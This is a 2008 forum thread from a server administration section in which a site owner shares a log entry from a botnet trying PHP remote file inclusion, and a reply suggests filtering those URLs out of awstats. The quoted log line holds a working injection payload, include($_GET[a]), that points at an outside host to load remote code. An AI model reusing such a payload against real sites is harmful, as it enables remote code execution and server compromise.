Tycoon Talk
Become a Big fish!
The number 1 forum for online business!
Post topics, ask questions, share your knowledge.
Tycoon Talk is part of Freelancer.com - find skilled workers online at a fraction of the cost.

Website and Server Administration Forum


You are currently viewing our Website and Server Administration Forum as a guest. Please register to participate.
Login



Reply
Old 04-28-2008, 10:59 PM php attacks in logs
Junior Talker

Posts: 3
Trades: 0
For months now, I have been seeing attacks that are trying to inject php from other sites through the URL that is passed. Here is an example log:
Code:
syslog.org:80.219.159.57 - - [28/Apr/2008:21:48:14 -0400] "GET /forum/index.php?topic=82.0//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
I get tens of thousands of these per day across many sites. They come from hundreds of different IP's, with each IP only used a few times. Clearly, the source of the requests is a botnet, and they are essentially "fuzz testing" the sites.

The most pragmatic issue I have with this is that I believe it junks up the stats in tools like awstats. Are other people seeing this, and how are you handling it?
__________________

Please login or register to view this content. Registration is FREE
|
Please login or register to view this content. Registration is FREE
|
Please login or register to view this content. Registration is FREE
|
Please login or register to view this content. Registration is FREE
confusion is offline
Reply With Quote
View Public Profile
 
 
Register now for full access!
Old 05-01-2008, 08:34 PM Re: php attacks in logs
Average Talker

Posts: 15
Name: Chris
Location: UK
Trades: 0
In awstats config you can filter it during stats generation to leave out url's with specific strings so set the filter not to include any containing "include($_GET".

I cant remember the option of the top of my head, however its in the docs and I have used it in the past.
__________________
Chris
.Net C# ASP.NET Developer
Windows Systems Administrator
crashed is offline
Reply With Quote
View Public Profile
 
Reply     « Reply to php attacks in logs
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off





   
RSS Feed  Feeds: RSS   JS   XML
RSS Feed  Feeds for this forum: RSS   JS   XML



Page generated in 0.09983 seconds with 12 queries